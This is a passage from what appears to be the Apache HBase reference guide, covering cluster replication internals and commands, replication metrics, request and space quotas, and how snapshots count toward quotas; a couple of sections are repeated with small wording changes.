HBase Shell, add the destination cluster as a peer, using the `add_peer` command.\n. On the source cluster, in HBase Shell, enable the table replication, using the `enable_table_replication` command.\n. Check the logs to see if replication is taking place. If so, you will see messages like the following, coming from the ReplicationSource.\n----\nLOG.info(\"Replicating \"+clusterId + \" -> \" + peerClusterId);\n----\n\n.Cluster Management Commands\nadd_peer <ID> <CLUSTER_KEY>::\n Adds a replication relationship between two clusters. +\n * ID -- a unique string, which must not contain a hyphen.\n * CLUSTER_KEY -- composed using the following template, with appropriate place-holders: `hbase.zookeeper.quorum:hbase.zookeeper.property.clientPort:zookeeper.znode.parent`\n * STATE (optional) -- ENABLED or DISABLED; the default value is ENABLED\nlist_peers:: List all replication relationships known by this cluster\nenable_peer <ID>::\n Enable a previously-disabled replication relationship\ndisable_peer <ID>::\n Disable a replication relationship. HBase will no longer send edits to that\n peer cluster, but it still keeps track of all the new WALs that it will need\n to replicate if and when it is re-enabled. WALs are retained when enabling or disabling\n replication as long as peers exist.\nremove_peer <ID>::\n Disable and remove a replication relationship. HBase will no longer send edits to that peer cluster or keep track of WALs.\nenable_table_replication <TABLE_NAME>::\n Enable the table replication switch for all its column families. If the table is not found in the destination cluster then it will create one with the same name and column families.\ndisable_table_replication <TABLE_NAME>::\n Disable the table replication switch for all its column families.
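\n\nFor example, a typical session on the source cluster might look like the following. The peer ID, ZooKeeper quorum, and table name are placeholders.\n\n----\n\nhbase> add_peer '1', 'zk1.example.com,zk2.example.com,zk3.example.com:2181:\/hbase'\nhbase> list_peers\nhbase> enable_table_replication 'my_table'\nhbase> disable_peer '1'\nhbase> enable_peer '1'\n----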
\n\n=== Verifying Replicated Data\n\nThe `VerifyReplication` MapReduce job, which is included in HBase, performs a systematic comparison of replicated data between two different clusters. Run the VerifyReplication job on the master cluster, supplying it with the peer ID and table name to use for validation. You can limit the verification further by specifying a time range or specific families. The job's short name is `verifyrep`. To run the job, use a command like the following:\n\n[source,bash]\n----\n$ HADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` \"${HADOOP_HOME}\/bin\/hadoop\" jar \"${HBASE_HOME}\/hbase-server-VERSION.jar\" verifyrep --starttime=<timestamp> --endtime=<timestamp> --families=<myFam> <ID> <tableName>\n----\n\nThe `VerifyReplication` command prints out `GOODROWS` and `BADROWS` counters to indicate rows that did and did not replicate correctly.\n\n=== Detailed Information About Cluster Replication\n\n.Replication Architecture Overview\nimage::replication_overview.png[]\n\n==== Life of a WAL Edit\n\nA single WAL edit goes through several steps in order to be replicated to a slave cluster.\n\n. An HBase client uses a Put or Delete operation to manipulate data in HBase.\n. The region server writes the request to the WAL in a way that allows it to be replayed if it is not written successfully.\n. If the changed cell corresponds to a column family that is scoped for replication, the edit is added to the queue for replication.\n. In a separate thread, the edit is read from the log, as part of a batch process.\n Only the KeyValues that are eligible for replication are kept.\n Replicable KeyValues are part of a column family whose schema is scoped GLOBAL, are not part of a catalog such as `hbase:meta`, did not originate from the target slave cluster, and have not already been consumed by the target slave cluster.\n. The edit is tagged with the master's UUID and added to a buffer.\n When the buffer is filled, or the reader reaches the end of the file, the buffer is sent to a random region server on the slave cluster.\n. 
The region server reads the edits sequentially and separates them into buffers, one buffer per table.\n After all edits are read, each buffer is flushed using link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Table.html[Table], HBase's normal client.\n The master's UUID and the UUIDs of slaves which have already consumed the data are preserved in the edits when they are applied, in order to prevent replication loops.\n. In the master, the offset for the WAL that is currently being replicated is registered in ZooKeeper.\n\nThe steps above assume the slave cluster is available. If it is not, the process differs as follows:\n\n. The first three steps, where the edit is inserted, are identical.\n. Again in a separate thread, the region server reads, filters, and ships the log edits in the same way as above, but the slave region server does not answer the RPC call.\n. The master sleeps and tries again a configurable number of times.\n. If the slave region server is still not available, the master selects a new subset of region servers to replicate to, and tries again to send the buffer of edits.\n. Meanwhile, the WALs are rolled and stored in a queue in ZooKeeper.\n Logs that are [firstterm]_archived_ by their region server, by moving them from the region server's log directory to a central log directory, will update their paths in the in-memory queue of the replicating thread.\n. When the slave cluster is finally available, the buffer is applied in the same way as during normal processing.\n The master region server will then replicate the backlog of logs that accumulated during the outage.\n\n.Spreading Queue Failover Load\nWhen replication is active, a subset of region servers in the source cluster is responsible for shipping edits to the sink.\nThis responsibility must be failed over like all other region server functions should a process or node crash.\nThe following configuration settings are recommended for maintaining an even distribution of replication activity over the remaining live servers in the source cluster:\n\n* Set `replication.source.maxretriesmultiplier` to `300`.\n* Set `replication.source.sleepforretries` to `1` (1 second). 
This value, combined with the value of `replication.source.maxretriesmultiplier`, causes the retry cycle to last about 5 minutes.\n* Set `replication.sleep.before.failover` to `30000` (30 seconds) in the source cluster site configuration.\n\n[[cluster.replication.preserving.tags]]\n.Preserving Tags During Replication\nBy default, the codec used for replication between clusters strips tags, such as cell-level ACLs, from cells.\nTo prevent the tags from being stripped, you can use a different codec which does not strip them.\nConfigure `hbase.replication.rpc.codec` to use `org.apache.hadoop.hbase.codec.KeyValueCodecWithTags`, on both the source and sink RegionServers involved in the replication.\nThis option was introduced in link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-10322[HBASE-10322].\n\n==== Replication Internals\n\nReplication State in ZooKeeper::\n HBase replication maintains its state in ZooKeeper.\n By default, the state is contained in the base node _\/hbase\/replication_.\n This node contains two child nodes, the `Peers` znode and the `RS` znode.\n\nThe `Peers` Znode::\n The `peers` znode is stored in _\/hbase\/replication\/peers_ by default.\n It consists of a list of all peer replication clusters, along with the status of each of them.\n The value of each peer is its cluster key, which is provided in the HBase Shell.\n The cluster key contains a list of ZooKeeper nodes in the cluster's quorum, the client port for the ZooKeeper quorum, and the base znode for HBase on that cluster.\n\nThe `RS` Znode::\n The `rs` znode contains a list of WAL logs which need to be replicated.\n This list is divided into a set of queues organized by region server and the peer cluster the region server is shipping the logs to.\n The rs znode has one child znode for each region server in the cluster.\n The child znode name is the region server's hostname, client port, and start code.\n This list includes both live and dead region servers.\n\n==== Choosing Region Servers to Replicate To\n\nWhen a master cluster region server initiates a replication source to a slave cluster, it first connects to the slave's ZooKeeper ensemble using the provided cluster key. It then scans the _rs\/_ directory to discover all the available sinks (region servers that are accepting incoming streams of edits to replicate) and randomly chooses a subset of them using a configured ratio which has a default value of 10%. 
For example, if a slave cluster has 150 machines, 15 will be chosen as potential recipients for edits that this master cluster region server sends.\nBecause this selection is performed by each master region server, the probability that all slave region servers are used is very high, and this method works for clusters of any size.\nFor example, a master cluster of 10 machines replicating to a slave cluster of 5 machines with a ratio of 10% causes the master cluster region servers to choose one machine each at random.\n\nA ZooKeeper watcher is placed on the _${zookeeper.znode.parent}\/rs_ node of the slave cluster by each of the master cluster's region servers.\nThis watch is used to monitor changes in the composition of the slave cluster.\nWhen nodes are removed from the slave cluster, or if nodes go down or come back up, the master cluster's region servers will respond by selecting a new pool of slave region servers to replicate to.\n\n==== Keeping Track of Logs\n\nEach master cluster region server has its own znode in the replication znodes hierarchy.\nIt contains one znode per peer cluster (if 5 slave clusters, 5 znodes are created), and each of these contains a queue of WALs to process.\nEach of these queues will track the WALs created by that region server, but they can differ in size.\nFor example, if one slave cluster becomes unavailable for some time, the WALs should not be deleted, so they need to stay in the queue while the others are processed.\nSee <<rs.failover.details,rs.failover.details>> for an example.\n\nWhen a source is instantiated, it contains the current WAL that the region server is writing to.\nDuring log rolling, the new file is added to the queue of each slave cluster's znode just before it is made available.\nThis ensures that all the sources are aware that a new log exists before the region server is able to append edits into it, but this operation is now more expensive.\nThe queue items are discarded when the replication thread cannot read more entries from a file (because it reached the end of the last block) and there are other files in the queue.\nThis means that if a source is up to date and replicates from the log that the region server writes to, reading up to the \"end\" of the current file will not delete the item in the queue.\n\nA log can be archived if it is no longer used or if the number of logs exceeds `hbase.regionserver.maxlogs` because the insertion rate is faster than regions are flushed.\nWhen a log is archived, the source threads are notified that the path for that log changed.\nIf a particular source has already finished with an archived log, it will just ignore the message.\nIf the log is in the queue, the path will be updated in memory.\nIf the log is currently being replicated, the change will be done atomically so that the reader doesn't attempt to open the file when it has already been moved.\nBecause moving a file is a NameNode operation, if the reader is currently reading the log, it won't generate any exception.\n\n==== Reading, Filtering and Sending Edits\n\nBy default, a source attempts to read from a WAL and ship log entries to a sink as quickly as possible.\nSpeed is limited by the filtering of log entries: only KeyValues that are scoped GLOBAL and that do not belong to catalog tables will be retained.\nSpeed is also limited by total size of the list of edits to replicate per slave, which is limited to 64 MB by default.\nWith this configuration, a master cluster region server with three slaves would use at most 192 MB to store data 
to replicate.\nThis does not account for the data which was filtered but not garbage collected.\n\nOnce the maximum size of edits has been buffered or the reader reaches the end of the WAL, the source thread stops reading and chooses at random a sink to replicate to (from the list that was generated by keeping only a subset of slave region servers). It directly issues an RPC to the chosen region server and waits for the method to return.\nIf the RPC was successful, the source determines whether the current file has been emptied or it contains more data which needs to be read.\nIf the file has been emptied, the source deletes the znode in the queue.\nOtherwise, it registers the new offset in the log's znode.\nIf the RPC threw an exception, the source will retry 10 times before trying to find a different sink.\n\n==== Cleaning Logs\n\nIf replication is not enabled, the master's log-cleaning thread deletes old logs using a configured TTL.\nThis TTL-based method does not work well with replication, because archived logs which have exceeded their TTL may still be in a queue.\nThe default behavior is augmented so that if a log is past its TTL, the cleaning thread looks up every queue until it finds the log, while caching queues it has found.\nIf the log is not found in any queues, the log will be deleted.\nThe next time the cleaning process needs to look for a log, it starts by using its cached list.\n\nNOTE: WALs are saved when replication is enabled or disabled as long as peers exist.\n\n[[rs.failover.details]]\n==== Region Server Failover\n\nWhen no region servers are failing, keeping track of the logs in ZooKeeper adds no value.\nUnfortunately, region servers do fail, and since ZooKeeper is highly available, it is useful for managing the transfer of the queues in the event of a failure.\n\nEach of the master cluster region servers keeps a watcher on every other region server, in order to be notified when one dies (just as the master does). 
When a failure happens, they all race to create a znode called `lock` inside the dead region server's znode that contains its queues.\nThe region server that creates it successfully then transfers all the queues to its own znode, one at a time since ZooKeeper does not support renaming queues.\nAfter queues are all transferred, they are deleted from the old location.\nThe znodes that were recovered are renamed with the ID of the slave cluster appended with the name of the dead server.\n\nNext, the master cluster region server creates one new source thread per copied queue, and each of the source threads follows the read\/filter\/ship pattern.\nThe main difference is that those queues will never receive new data, since they do not belong to their new region server.\nWhen the reader hits the end of the last log, the queue's znode is deleted and the master cluster region server closes that replication source.\n\nGiven a master cluster with 3 region servers replicating to a single slave with id `2`, the following hierarchy represents what the znodes layout could be at some point in time.\nThe region servers' znodes all contain a `peers` znode which contains a single queue.\nThe znode names in the queues represent the actual file names on HDFS in the form `address,port.timestamp`.\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1234 (Contains a position)\n 1.1.1.1,60020.1265\n 1.1.1.2,60020,123456790\/\n 2\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n 1.1.1.3,60020,123456630\/\n 2\/\n 1.1.1.3,60020.1280 (Contains a position)\n----\n\nAssume that 1.1.1.2 loses its ZooKeeper session.\nThe survivors will race to create a lock, and, arbitrarily, 1.1.1.3 wins.\nIt will then start transferring all the queues to its local peers znode by appending the name of the dead server.\nRight before 1.1.1.3 is able to clean up the old znodes, the layout will look like the following:\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1234 (Contains a position)\n 1.1.1.1,60020.1265\n 1.1.1.2,60020,123456790\/\n lock\n 2\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n 1.1.1.3,60020,123456630\/\n 2\/\n 1.1.1.3,60020.1280 (Contains a position)\n\n 2-1.1.1.2,60020,123456790\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n----\n\nSome time later, but before 1.1.1.3 is able to finish replicating the last WAL from 1.1.1.2, it dies too.\nSome new logs were also created in the normal queues.\nThe last region server will then try to lock 1.1.1.3's znode and will begin transferring all the queues.\nThe new layout will be:\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1378 (Contains a position)\n\n 2-1.1.1.3,60020,123456630\/\n 1.1.1.3,60020.1325 (Contains a position)\n 1.1.1.3,60020.1401\n\n 2-1.1.1.2,60020,123456790-1.1.1.3,60020,123456630\/\n 1.1.1.2,60020.1312 (Contains a position)\n 1.1.1.3,60020,123456630\/\n lock\n 2\/\n 1.1.1.3,60020.1325 (Contains a position)\n 1.1.1.3,60020.1401\n\n 2-1.1.1.2,60020,123456790\/\n 1.1.1.2,60020.1312 (Contains a position)\n----\n\n=== Replication Metrics\n\nThe following metrics are exposed at the global region server level and at the peer level:\n\n`source.sizeOfLogQueue`::\n number of WALs to process (excludes the one which is being processed) at the Replication source\n\n`source.shippedOps`::\n number of mutations 
shipped\n\n`source.logEditsRead`::\n number of mutations read from WALs at the replication source\n\n`source.ageOfLastShippedOp`::\n age of last batch that was shipped by the replication source\n\n`source.completedLogs`::\n The number of write-ahead-log files that have completed their acknowledged sending to the peer associated with this source. Increments to this metric are a part of normal operation of HBase replication.\n\n`source.completedRecoverQueues`::\n The number of recovery queues this source has completed sending to the associated peer. Increments to this metric are a part of normal recovery of HBase replication in the face of failed Region Servers.\n\n`source.uncleanlyClosedLogs`::\n The number of write-ahead-log files the replication system considered completed after reaching the end of readable entries in the face of an uncleanly closed file.\n\n`source.ignoredUncleanlyClosedLogContentsInBytes`::\n When a write-ahead-log file is not closed cleanly, there will likely be some entry that has been partially serialized. This metric contains the number of bytes of such entries the HBase replication system believes were remaining at the end of files skipped in the face of an uncleanly closed file. Those bytes should either be in a different file or represent a client write that was not acknowledged.\n\n`source.restartedLogReading`::\n The number of times the HBase replication system detected that it failed to correctly parse a cleanly closed write-ahead-log file. In this circumstance, the system replays the entire log from the beginning, ensuring that no edits fail to be acknowledged by the associated peer. Increments to this metric indicate that the HBase replication system is having difficulty correctly handling failures in the underlying distributed storage system. No data loss should occur, but you should check Region Server log files for details of the failures.\n\n`source.repeatedLogFileBytes`::\n When the HBase replication system determines that it needs to replay a given write-ahead-log file, this metric is incremented by the number of bytes the replication system believes had already been acknowledged by the associated peer prior to starting over.\n\n`source.closedLogsWithUnknownFileLength`::\n Incremented when the HBase replication system believes it is at the end of a write-ahead-log file but it can not determine the length of that file in the underlying distributed storage system. Could indicate data loss since the replication system is unable to determine if the end of readable entries lines up with the expected end of the file. 
You should check Region Server log files for details of the failures.\n\n\n=== Replication Configuration Options\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| Option\n| Description\n| Default\n\n| zookeeper.znode.parent\n| The name of the base ZooKeeper znode used for HBase\n| \/hbase\n\n| zookeeper.znode.replication\n| The name of the base znode used for replication\n| replication\n\n| zookeeper.znode.replication.peers\n| The name of the peer znode\n| peers\n\n| zookeeper.znode.replication.peers.state\n| The name of peer-state znode\n| peer-state\n\n| zookeeper.znode.replication.rs\n| The name of the rs znode\n| rs\n\n| replication.sleep.before.failover\n| How many milliseconds a worker should sleep before attempting to replicate\n a dead region server's WAL queues.\n|\n\n| replication.executor.workers\n| The number of region servers a given region server should attempt to\n failover simultaneously.\n| 1\n|===\n\n=== Monitoring Replication Status\n\nYou can use the HBase Shell command `status 'replication'` to monitor the replication status on your cluster. The command has three variations:\n\n* `status 'replication'` -- prints the status of each source and its sinks, sorted by hostname.\n* `status 'replication', 'source'` -- prints the status for each replication source, sorted by hostname.\n* `status 'replication', 'sink'` -- prints the status for each replication sink, sorted by hostname.\n\n== Running Multiple Workloads On a Single Cluster\n\nHBase provides the following mechanisms for managing the performance of a cluster\nhandling multiple workloads:\n\n. <<quota>>\n. <<request_queues>>\n. <<multiple-typed-queues>>\n\n[[quota]]\n=== Quotas\nHBASE-11598 introduces RPC quotas, which allow you to throttle requests based on\nthe following limits:\n\n. <<request-quotas,The number or size of requests (read, write, or read+write) in a given timeframe>>\n. <<namespace_quotas,The number of tables allowed in a namespace>>\n\nThese limits can be enforced for a specified user, table, or namespace.\n\n.Enabling Quotas\n\nQuotas are disabled by default. To enable the feature, set the `hbase.quota.enabled`\nproperty to `true` in the _hbase-site.xml_ file for all cluster nodes.\n\n.General Quota Syntax\n. THROTTLE_TYPE can be expressed as READ, WRITE, or the default type (read + write).\n. Timeframes can be expressed in the following units: `sec`, `min`, `hour`, `day`\n. Request sizes can be expressed in the following units: `B` (bytes), `K` (kilobytes),\n`M` (megabytes), `G` (gigabytes), `T` (terabytes), `P` (petabytes)\n. Numbers of requests are expressed as an integer followed by the string `req`\n. Limits relating to time are expressed as req\/time or size\/time. For instance `10req\/day`\nor `100P\/hour`.\n. Numbers of tables or regions are expressed as integers.\n\n[[request-quotas]]\n.Setting Request Quotas\nYou can set quota rules ahead of time, or you can change the throttle at runtime. The change\nwill propagate after the quota refresh period has expired. This expiration period\ndefaults to 5 minutes. To change it, modify the `hbase.quota.refresh.period` property\nin `hbase-site.xml`. 
This property is expressed in milliseconds and defaults to `300000`.\n\n----\n# Limit user u1 to 10 requests per second\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 read requests per second\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 M per day everywhere\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10M\/day'\n\n# Limit user u1 to 10 M write size per sec\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => WRITE, USER => 'u1', LIMIT => '10M\/sec'\n\n# Limit user u1 to 5k per minute on table t2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', TABLE => 't2', LIMIT => '5K\/min'\n\n# Limit user u1 to 10 read requests per sec on table t2\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', TABLE => 't2', LIMIT => '10req\/sec'\n\n# Remove an existing limit from user u1 on namespace ns2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', NAMESPACE => 'ns2', LIMIT => NONE\n\n# Limit all users to 10 requests per hour on namespace ns1\nhbase> set_quota TYPE => THROTTLE, NAMESPACE => 'ns1', LIMIT => '10req\/hour'\n\n# Limit all users to 10 T per hour on table t1\nhbase> set_quota TYPE => THROTTLE, TABLE => 't1', LIMIT => '10T\/hour'\n\n# Remove all existing limits from user u1\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => NONE\n\n# List all quotas for user u1 in namespace ns2\nhbase> list_quotas USER => 'u1', NAMESPACE => 'ns2'\n\n# List all quotas for namespace ns2\nhbase> list_quotas NAMESPACE => 'ns2'\n\n# List all quotas for table t1\nhbase> list_quotas TABLE => 't1'\n\n# list all quotas\nhbase> list_quotas\n----\n\nYou can also place a global limit and exclude a user or a table from the limit by applying the\n`GLOBAL_BYPASS` property.\n----\nhbase> set_quota NAMESPACE => 'ns1', LIMIT => '100req\/min' # a per-namespace request limit\nhbase> set_quota USER => 'u1', GLOBAL_BYPASS => true # user u1 is not affected by the limit\n----\n\n[[namespace_quotas]]\n.Setting Namespace Quotas\n\nYou can specify the maximum number of tables or regions allowed in a given namespace, either\nwhen you create the namespace or by altering an existing namespace, by setting the\n`hbase.namespace.quota.maxtables` property on the namespace.\n\n.Limiting Tables Per Namespace\n----\n# Create a namespace with a max of 5 tables\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxtables'=>'5'}\n\n# Alter an existing namespace to have a max of 8 tables\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxtables'=>'8'}\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns2'\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=>'hbase.namespace.quota.maxtables'}\n----\n\n.Limiting Regions Per Namespace\n----\n# Create a namespace with a max of 10 regions\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxregions'=>'10'}\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns1'\n\n# Alter an existing namespace to have a max of 20 regions\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxregions'=>'20'}\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=> 'hbase.namespace.quota.maxregions'}\n----\n\n[[request_queues]]\n=== Request Queues\nIf no throttling policy is configured, when the RegionServer receives multiple requests,\nthey are now placed into a 
queue waiting for a free execution slot (HBASE-6721).\nThe simplest queue is a FIFO queue, where each request waits for all previous requests in the queue\nto finish before running. Fast or interactive queries can get stuck behind large requests.\n\nIf you are able to guess how long a request will take, you can reorder requests by\npushing the long requests to the end of the queue and allowing short requests to preempt\nthem. Eventually, you must still execute the large requests and prioritize the new\nrequests behind them. The short requests will be newer, so the result is not terrible,\nbut still suboptimal compared to a mechanism which allows large requests to be split\ninto multiple smaller ones.\n\nHBASE-10993 introduces such a system for deprioritizing long-running scanners. There\nare two types of queues, `fifo` and `deadline`. To configure the type of queue used,\nconfigure the `hbase.ipc.server.callqueue.type` property in `hbase-site.xml`. There\nis no way to estimate how long each request may take, so de-prioritization only affects\nscans, and is based on the number of \u201cnext\u201d calls a scan request has made. An assumption\nis made that when you are doing a full table scan, your job is not likely to be interactive,\nso if there are concurrent requests, you can delay long-running scans up to a limit tunable by\nsetting the `hbase.ipc.server.queue.max.call.delay` property. The slope of the delay is calculated\nby a simple square root of `(numNextCall * weight)` where the weight is\nconfigurable by setting the `hbase.ipc.server.scan.vtime.weight` property.\n\n[[multiple-typed-queues]]\n=== Multiple-Typed Queues\n\nYou can also prioritize or deprioritize different kinds of requests by configuring\na specified number of dedicated handlers and queues. You can segregate the scan requests\nin a single queue with a single handler, and all the other available queues can service\nshort `Get` requests.\n\nYou can adjust the IPC queues and handlers based on the type of workload, using static\ntuning options. This approach is an interim first step that will eventually allow\nyou to change the settings at runtime, and to dynamically adjust values based on the load.\n\n.Multiple Queues\n\nTo avoid contention and separate different kinds of requests, configure the\n`hbase.ipc.server.callqueue.handler.factor` property, which allows you to increase the number of\nqueues and control how many handlers can share the same queue.\n\nUsing more queues reduces contention when adding a task to a queue or selecting it\nfrom a queue. You can even configure one queue per handler. The trade-off is that\nif some queues contain long-running tasks, a handler may need to wait to execute from that queue\nrather than stealing from another queue which has waiting tasks.\n\n.Read and Write Queues\nWith multiple queues, you can now divide read and write requests, giving more priority\n(more queues) to one or the other type. Use the `hbase.ipc.server.callqueue.read.ratio`\nproperty to choose to serve more reads or more writes.\n\n.Get and Scan Queues\nSimilar to the read\/write split, you can split gets and scans by tuning the `hbase.ipc.server.callqueue.scan.ratio`\nproperty to give more priority to gets or to scans. A scan ratio of `0.1` will give\nmore queue\/handlers to the incoming gets, which means that more gets can be processed\nat the same time and that fewer scans can be executed at the same time. 
A value of\n`0.9` will give more queue\/handlers to scans, so the number of scans executed will\nincrease and the number of gets will decrease.\n\n[[space-quotas]]\n=== Space Quotas\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-16961[HBASE-16961] introduces a new type of\nquotas for HBase to leverage: filesystem quotas. These \"space\" quotas limit the amount of space\non the filesystem that HBase namespaces and tables can consume. If a user, malicious or ignorant,\nhas the ability to write data into HBase, with enough time, that user can effectively crash HBase\n(or worse, HDFS) by consuming all available space. When there is no filesystem space available,\nHBase crashes because it can no longer create\/sync data to the write-ahead log.\n\nThis feature allows a limit to be set on the size of a table or namespace. When a space quota is set\non a namespace, the quota's limit applies to the sum of usage of all tables in that namespace.\nWhen a table with a quota exists in a namespace with a quota, the table quota takes priority\nover the namespace quota. This allows for a scenario where a large limit can be placed on\na collection of tables, but a single table in that collection can have a fine-grained limit set.\n\nThe existing `set_quota` and `list_quota` HBase shell commands can be used to interact with\nspace quotas. Space quotas are quotas with a `TYPE` of `SPACE` and have `LIMIT` and `POLICY`\nattributes. The `LIMIT` is a string that refers to the amount of space on the filesystem\nthat the quota subject (e.g. the table or namespace) may consume. For example, valid values\nof `LIMIT` are `'10G'`, `'2T'`, or `'256M'`. The `POLICY` refers to the action that HBase will\ntake when the quota subject's usage exceeds the `LIMIT`. The following are valid `POLICY` values.\n\n* `NO_INSERTS` - No new data may be written (e.g. 
`Put`, `Increment`, `Append`).\n* `NO_WRITES` - Same as `NO_INSERTS` but `Deletes` are also disallowed.\n* `NO_WRITES_COMPACTIONS` - Same as `NO_WRITES` but compactions are also disallowed.\n* `DISABLE` - The table(s) are disabled, preventing all read\/write access.\n\n.Setting simple space quotas\n----\n# Sets a quota on the table 't1' with a limit of 1GB, disallowing Puts\/Increments\/Appends when the table exceeds 1GB\nhbase> set_quota TYPE => SPACE, TABLE => 't1', LIMIT => '1G', POLICY => NO_INSERTS\n\n# Sets a quota on the namespace 'ns1' with a limit of 50TB, disallowing Puts\/Increments\/Appends\/Deletes\nhbase> set_quota TYPE => SPACE, NAMESPACE => 'ns1', LIMIT => '50T', POLICY => NO_WRITES\n\n# Sets a quota on the table 't3' with a limit of 2TB, disallowing any writes and compactions when the table exceeds 2TB.\nhbase> set_quota TYPE => SPACE, TABLE => 't3', LIMIT => '2T', POLICY => NO_WRITES_COMPACTIONS\n\n# Sets a quota on the table 't2' with a limit of 50GB, disabling the table when it exceeds 50GB\nhbase> set_quota TYPE => SPACE, TABLE => 't2', LIMIT => '50G', POLICY => DISABLE\n----\n\nConsider the following scenario to set up quotas on a namespace, overriding the quota on tables in that namespace.\n\n.Table and Namespace space quotas\n----\nhbase> create_namespace 'ns1'\nhbase> create 'ns1:t1'\nhbase> create 'ns1:t2'\nhbase> create 'ns1:t3'\nhbase> set_quota TYPE => SPACE, NAMESPACE => 'ns1', LIMIT => '100T', POLICY => NO_INSERTS\nhbase> set_quota TYPE => SPACE, TABLE => 'ns1:t2', LIMIT => '200G', POLICY => NO_WRITES\nhbase> set_quota TYPE => SPACE, TABLE => 'ns1:t3', LIMIT => '20T', POLICY => NO_WRITES\n----\n\nIn the above scenario, the tables in the namespace `ns1` will not be allowed to consume more than\n100TB of space on the filesystem among each other. The table 'ns1:t2' is only allowed to be 200GB in size, and will\ndisallow all writes when the usage exceeds this limit. The table 'ns1:t3' is allowed to grow to 20TB in size\nand also will disallow all writes when the usage exceeds this limit. Because there is no table quota\non 'ns1:t1', this table can grow up to 100TB, but only if 'ns1:t2' and 'ns1:t3' have a usage of zero bytes.\nPractically, its limit is 100TB less the current usage of 'ns1:t2' and 'ns1:t3'.\n\n[[ops.space.quota.deletion]]\n=== Disabling Automatic Space Quota Deletion\n\nBy default, if a table or namespace is deleted that has a space quota, the quota itself is\nalso deleted. In some cases, it may be desirable for the space quota to not be automatically deleted.\nIn these cases, the user may configure the system to not delete any space quota automatically via hbase-site.xml.\n\n[source,xml]\n----\n\n <property>\n <name>hbase.master.quota.observer.ignore<\/name>\n <value>true<\/value>\n <\/property>\n----\n\n=== HBase Snapshots with Space Quotas\n\nOne common area of unintended-filesystem-use with HBase is via HBase snapshots. Because snapshots\nexist outside of the management of HBase tables, it is not uncommon for administrators to suddenly\nrealize that hundreds of gigabytes or terabytes of space is being used by HBase snapshots which were\nforgotten and never removed.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-17748[HBASE-17748] is the umbrella JIRA issue which\nexpands on the original space quota functionality to also include HBase snapshots. While this is a confusing\nsubject, the implementation attempts to present this support in as reasonable and simple a manner as\npossible for administrators. 
[[ops.space.quota.deletion]]\n=== Disabling Automatic Space Quota Deletion\n\nBy default, if a table or namespace is deleted that has a space quota, the quota itself is\nalso deleted. In some cases, it may be desirable for the space quota to not be automatically deleted.\nIn these cases, the user may configure the system to not delete any space quota automatically via hbase-site.xml.\n\n[source,xml]\n----\n\n <property>\n <name>hbase.master.quota.observer.ignore<\/name>\n <value>true<\/value>\n <\/property>\n----\n\n=== HBase Snapshots with Space Quotas\n\nOne common area of unintended-filesystem-use with HBase is via HBase snapshots. Because snapshots\nexist outside of the management of HBase tables, it is not uncommon for administrators to suddenly\nrealize that hundreds of gigabytes or terabytes of space is being used by HBase snapshots which were\nforgotten and never removed.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-17748[HBASE-17748] is the umbrella JIRA issue which\nexpands on the original space quota functionality to also include HBase snapshots. While this can be a confusing\nsubject, the implementation attempts to present this support in as reasonable and simple a manner as\npossible for administrators. This feature does not make any changes to administrator interaction with\nspace quotas, only to the internal computation of table\/namespace usage. Table and namespace usage will\nautomatically incorporate the size taken by a snapshot per the rules defined below.\n\nAs a review, let's cover a snapshot's lifecycle: a snapshot is metadata which points to\na list of HFiles on the filesystem. This is why creating a snapshot is a very cheap operation; no HBase\ntable data is actually copied to perform a snapshot. Cloning a snapshot into a new table or restoring\na table is a cheap operation for the same reason; the new table references the files which already exist\non the filesystem without a copy. To include snapshots in space quotas, we need to define which table\n\"owns\" a file when a snapshot references the file (\"owns\" refers to encompassing the filesystem usage\nof that file).\n\nConsider a snapshot which was made against a table. When the snapshot refers to a file and the table no\nlonger refers to that file, the \"originating\" table \"owns\" that file. When multiple snapshots refer to\nthe same file and no table refers to that file, the snapshot with the lowest-sorting name (lexicographically)\nis chosen and the table which that snapshot was created from \"owns\" that file. HFiles are not \"double-counted\"\nwhen a table and one or more snapshots refer to that HFile.\n\nWhen a table is \"rematerialized\" (via `clone_snapshot` or `restore_snapshot`), a similar problem of file\nownership arises. In this case, while the rematerialized table references a file which a snapshot also\nreferences, the table does not \"own\" the file. The table from which the snapshot was created still \"owns\"\nthat file. When the rematerialized table is compacted or the snapshot is deleted, the rematerialized table\nwill uniquely refer to a new file and \"own\" 